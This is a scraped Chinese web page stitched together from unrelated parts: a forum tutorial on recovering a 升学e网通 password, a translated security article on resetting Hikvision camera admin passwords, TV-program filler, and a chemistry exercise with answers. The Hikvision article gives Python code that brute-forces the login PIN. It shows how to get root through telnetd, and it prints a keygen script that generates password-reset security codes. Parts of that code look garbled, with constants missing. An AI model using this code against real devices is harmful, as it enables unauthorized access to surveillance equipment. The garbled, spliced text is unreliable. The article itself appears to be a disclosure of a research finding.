记生E通怎么填空间某一区域里有E.帐号和密码

【图片】【升学e网通教程】密码忘记怎么办?找回来~~~_升学e网通吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:92,147贴子:
【升学e网通教程】密码忘记怎么办?找回来~~~收藏
密码,这个最容易忘记的东东,虽然它是你曾经最熟悉的,但是时间长了,也会忘记~~忘记了怎么找回呢?下面向日葵姐姐来写步骤了哦~~觉得好的,记得给个赞,哈哈~~其实,密码找回有三种方式:1.手机找回
2密保问题找回
3.找客服帮助你找回。如何找客服,这个问题就不讲了吧,重点是第1和第2点第一步:进入密码找回页面:在首页的登陆框里面和右侧快捷导航里面都有的哦,根据下图自己找一下哦~点击《忘记密码》进入密码找回页面第二步:在找回密码页面里,然后输入你的账号,点击《确定》。第三步:这里你就可以选择不同的找回方式了,通过手机找回or通过密保问题找回。这里先介绍通过手机找回:在《通过“已绑定手机”》后面点击
“立即找回”第四步:根据页面要求填写账号、已绑定的手机号;然后点击《点击获取》就会有验证码发到你的手机上,再把手机上收到的验证码填写到“短信验证码”框内,点击确定即可第五步:输入新的验证码即可最后,使用密保问题找回的教程会在楼下哦~~~
如果填写了密码问题,也可以看看楼下哦~
2楼来写通过
密保问题找回的教程了,前面如何进入找回页面,就都不讲了,直接从第三步,选择找回方式开始哦~~接楼上第三步:选择找回方式,选择《通过“密保问题”》这个选项,点击后面的“立即找回”;第四步:点击“立即找回”后,进入密保找回页面。填写自己设置的密保问题的答案。(这个密保问题是你当时选择的问题)如果密保问题正确,接下来的第五步,同一楼也是一致的,这里就不再介绍了哦~~求好评,求动力~~
他不给发验证码怎么办
点亮12星座印记,
我现在高一没分科,那我在激活会员的时候是填文科生,理科生还是不分科呢?
看着不错,路过一看
真是不错的。
点亮12星座印记,
我试了好多次了,他就说不给我发验证码
楼主辛苦了
谢谢楼主的分享
客服繁忙,打不通
手机上的怎么弄,而且我的帐号也忘了怎么办
帐号登上不是会员 怎么回事
我手机卡丢了怎么办
没有找回密码这一栏
用qq可以登录吗?
忘记了卡号怎么办
登录百度帐号技术讨论 | 看我如何重置海康威视IP摄像机的管理员密码
写在前面的话
我们经常在网上看到某某通用IP摄像机被黑客利用的新闻。大多数情况下,制造商并不会强制用户设置安全密码,通常您可以使用默认密码直接登录。但有些厂商与众不同——海康威视。首次登录时使用密码是12345,但接下来会强制您更改密码。这难道可以阻止攻击者访问设备吗?然而并没有。第一次我开始测试海康威视DS-7604NI-E1 NVR的安全性时,因为我忘记了我设置的登录密码。谷歌告诉我可以使用海康威视的Search Active Devices Protocol工具,该工具除了可以扫描子网上的设备功能外,还可以选择重置设备的管理员密码。当我安装该工具并选择Forgot Password选项时,它会提示我输入一个安全密钥,但是我没有什么安全密钥。
所以这对我没什么卵用——我需要另一种方法进入。我可以在80端口上访问管理面板。使用Burp Suite拦截流量,并发现当用户尝试登录时,发现当用户试图登录时,会向位于/PSIA/Custom/SelfExt/userCheck的端点发出XHR GET请求。用户名和密码包含在内。该请求将返回带有字段的XML文档,如果验证失败则返回401,如果成功则返回200。我依稀记得那个pin只能包含数字,大概是5-6位数。此外,如果您输入错误的pin太多次,也不会锁定。这为爆破提供条件。了解这些之后,我用Python中创建了一个脚本,它只是遍历一系列pin码并检查响应:
from requests import get from base64 import b64encode url = 'http://192.168.1.133/PSIA/Custom/SelfExt/userCheck' for i in range(1): atoken = b64encode(b"admin:%i" % i) auth = ("Basic %s" % atoken.decode("utf-8")) r = get(url, headers={'Authorization': auth}) if "401" not in r.text: print(f"Found pin: {i}") break
大约30秒内我找到了我的密码。
好戏才开始
然而,密码重置选项引起了我的兴趣——如何在系统上检查代码?是否可以在本地生成它?为了找到这个答案,我需要设备上的二进制文件。幸运的是,一旦拥有管理员密码,就可以轻松获得对设备的root访问权限:您只需将一个PUT请求发送到/ISAPI/System/Network/telnetd的端点,并使用以下数据:
这将启用telnet守护程序,您可以将其连接并以root管理员身份登录。进入busybox shell:
$ telnet 192.168.1.133 Trying 192.168.1.133... Connected to 192.168.1.133. Escape character is '^]'. dvrdvs login: root Password: BusyBox v1.16.1 ( 09:41:10 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. can not change to guest! [root@dvrdvs /] #
经过一些基本的枚举尝试后,我发现当设备启动时,位于/home/hik/start.sh的脚本将执行,它向/home/app提取一些二进制文件,设置一些内容并最终执行二进制文件/home/app/hicore。考虑到它的大小,似乎正是我正在寻找的,所以我使用FTP将其上传到我的PC并运行。仅从输出结果来看,似乎这个二进制文件几乎负责所有事情:托管网络前端,后端,与SADP通信,检查密码,驱动连接的摄像头等。使用IDA打开,搜索的字符串security code,我发现Invalid security code的引用以及在0x9C0E6D对Default password of 'admin' restored的引用,这似乎是我一直在寻找:
这些由0xC51C0的子程序引用,如下所示:
从无效的密码分支向后查找,我们发现似乎它比较了两个字符串,其中一个是由0xC2D04处的子程序产生的, 另一个可能是用户输入。0xC2D04的子程序如下所示:
通过查看反汇编代码,很明显这是一个函数,它接受两个参数,一个作为种子的字符输入数组和指向输出位置的指针 ——从种子生成代码。我们接下来就会了解输入内容是什么了。现在,我们可以通过使用Hex-Rays生成函数的伪代码来看看:
看起来好像它为遍历输入,使用for循环生成一个数(由IDA命名为v5),使用循环计数器生成一些非常基本的算术(乘法和XOR)以及每个字符的数值。我们可以用Python表示如下:
def keygen(seed): magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i
然后将其乘以硬编码的数字,并将其格式化为字符串作为无符号long。在Python中,我们可以使用numpy来表示:
from numpy import uint32 [...] secret = str(uint32( * magic))
最后,for循环遍历字符串中的每个字符,并使用一些硬编码偏移量和字符值生成一个新字符串。在Python中表示为:
key = "" for digit in secret: digit = ord(digit) if digit & 51: key += chr(digit + 33) elif digit & 53: key += chr(digit + 62) elif digit & 55: key += chr(digit + 47) elif digit & 57: key += chr(digit + 66) else: key += chr(digit) return(key)
但是,由于字符只是使用几个偏移量生成,因此这实际上是一个替换密码,上面的块可以替换为:
c = str.maketrans("", "QRSqrdeyz") return secret.translate(c)
完成的keygen函数非常简短:
def keygen(seed): magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i secret = str(uint32( * magic)) c = str.maketrans("", "QRSqrdeyz") return secret.translate(c)
很好,但是究竟是什么才能成为种子呢?再看一下反汇编,看起来输入是一个从内存中取出的字符串,结合设备的日期格式为:{string}{yyyy}{mm}{dd}
0xC51FC也引用了相同的内存位置,它被用作以下sprintf参数:
所以这个神秘的字符串是设备的序列号。虽然这可以从SADP工具中获取,但如果与日期一起自动获取它会更容易。我在其中查找了带有“serial”的字符串,找到了一个XML响应模板:
这看起来非常像UPNP数据。在0xAE427D,我们甚至可以看到该文件的“location”。/upnpdevicedesc.xml确实可以发送GET请求来获取序列号,并且设备的本地时间包含在响应头中,这就是我们生成代码所需的全部内容。我们现在可以编写一个函数,它为keygen生成输入:
from requests import get import sys [...] def get_serial_date(ip): try: req = get(f"http://{ip}/upnpdevicedesc.xml") except Exception as e: print(f"Unable to connect to {ip}:\n{e}") sys.exit(-1)
密钥生成器的序列号实际上没有开头,所以我们需要删除它:
from re import search [...] model = search("(.*)", req.text).group(1) serial = search("(.*)", req.text).group(1) serial = serial.replace(model, "")
我们还需要重新格式化日期:
from datetime import datetime [...] datef = datetime.strptime(req.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT") date = datef.strftime("%Y%m%d") return f"{serial}{date}"
我们现在可以完成脚本的其余部分:
#!/usr/bin/env python3 import sys from re import search from numpy import uint32 from requests import get from datetime import datetime def keygen(seed): magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i secret = str(uint32( * magic)) c = str.maketrans("", "QRSqrdeyz") return secret.translate(c) def get_serial_date(ip): try: req = get(f"http://{ip}/upnpdevicedesc.xml") except Exception as e: print(f"Unable to connect to {ip}:\n{e}") sys.exit(-1) model = search("(.*)", req.text).group(1) serial = search("(.*)", req.text).group(1) serial = serial.replace(model, "") datef = datetime.strptime(req.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT") date = datef.strftime("%Y%m%d") return f"{serial}{date}" if __name__ == "__main__": if len(sys.argv) & 2: print(f"Usage: {sys.argv[0]} ") print("Connects to a Hikvision device and generates a security key") sys.exit(1) seed = get_serial_date(sys.argv[1]) print(f"Got seed: {seed}") key = keygen(seed) print(f"Generated security key: {key}")
运行此命令会生成一个密钥,当输入SADP时,确实会将密码重置为12345。
总而言之,这种安全措施是行不通的。更糟糕的是,它可能会产生一种假的安全感,而这种安全感可能会被攻击者滥用,从而无法正常工作。虽然我的脚本不允许您重置其他人的密码,因为您必须在本地摄像机的SADP中手动输入密码。
*参考来源:neonsea,周大涛编译,转载请注明来自FreeBuf.COM
责任编辑:
声明:该文观点仅代表作者本人,搜狐号系信息发布平台,搜狐仅提供信息存储空间服务。
今日搜狐热点片长:00:00:51
片长:00:07:18
片长:00:06:25
片长:00:07:44
片长:00:06:52
片长:00:07:33
片长:00:04:34
片长:00:06:15
片长:00:06:37
片长:00:05:28
片长:00:06:30
片长:00:06:52
片长:00:07:05
片长:00:04:00
片长:00:06:01
片长:00:06:32
片长:01:00:02
片长:01:00:02
片长:01:00:03
片长:01:00:03
片长:01:00:02
片长:01:00:03
片长:01:00:02
片长:01:00:02
片长:01:00:03
片长:01:00:03
片长:01:00:03
片长:01:00:02
片长:01:00:03
片长:01:00:03
片长:01:00:01
片长:01:00:03
《生活e点通》,栏目依据科教频道的整体定位,做足生活文章,打好服务牌,以“生活好帮手,服务大管家,生活e点通,一点你就通”为主线,将美食、营养、养生、保健、育儿、教育等与百姓生活息息相关的内容一一囊括。《生活e点通》愿做您的服务大管家,生活好帮手。
播出频道:安徽科教频道
播出时间:每日17:10
Copyright (C) 2016 安徽网络广播电视台皖ICP备号-1 网络视听节目许可证号1204051某兴趣活动小组利用物质间的相互转化.设计成一个平面魔方.如下图所示 已知①A.B.C.D.G含有同种元素. ② ③E是通常情况下密度最小的气体,B与硝酸银溶液反应生成不溶于稀硝酸的白色沉淀.也能将一种氧化物氧化为F.F是含有三种元素的化合物.与A反应生成E.G. 依据以上信息填空: (1)写出D的化学式 . (2)G生成C的过程中所出现的现象为 . 题目和参考答案——精英家教网——
暑假天气热?在家里学北京名师课程,
& 题目详情
某兴趣活动小组利用物质间的相互转化,设计成一个平面魔方,如下图所示
已知①A、B、C、D、G含有同种元素. ②
③E是通常情况下密度最小的气体;B与硝酸银溶液反应生成不溶于稀硝酸的白色沉淀,也能将一种氧化物氧化为F,F是含有三种元素的化合物,与A反应生成E、G. 依据以上信息填空: (1)写出D的化学式____________. (2)G生成C的过程中所出现的现象为____________________________. (3)写出下列反应的化学方程式: E→A_______________________________; A→B______________________________. (4)B→F的离子方程式为______________________.
(1)Fe2O3(2)先产生白色沉淀,迅速变为灰绿色,最后变为红褐色(3)4H2+Fe3O43Fe+4H2O;2Fe+3Cl22FeCl3(4)2Fe3++SO2+2H2O===2Fe2++SO42-+4H+
练习册系列答案
科目:高中化学
某兴趣活动小组利用物质间的互变,设计成一个平面魔方,如下图所示&已知①A、B、C、D、G含有同种元素。②&纯A(单质)B溶液D固体G溶液颜色银白色黄色红棕色浅绿色③E是通常情况下密度最小的气体;B与硝酸银溶液反应生成不溶于稀硝酸的白色沉淀,也能将一种氧化物氧化为F,F是含有三种元素的化合物,与A反应生成E、G。依据以上信息填空:&& (1)写出D的化学式     。&& (2)G生成C的过程中所出现的现象为                  。&& (3)写出下列反应的化学方程式:E→A                ; A→B            。&& (4)B→F的离子方程式为               。
精英家教网新版app上线啦!用app只需扫描书本条形码就能找到作业,家长给孩子检查作业更省心,同学们作业对答案更方便,扫描上方二维码立刻安装!
请输入姓名
请输入手机号温馨提示:建议您使用谷歌、火狐、IE9以上版本浏览器或360浏览器(极速模式)观看视频。
分享视频>>
flash地址:
<input type="text" value='' class="text"
id="shareurl1" />
<input type="text" value=""
class="text"
id="shareurl3" />
Copyright (C) 2016 安徽网络电视台版权所有
皖ICP备号-1

我要回帖

更多关于 空间某一区域里有E 的文章

 

随机推荐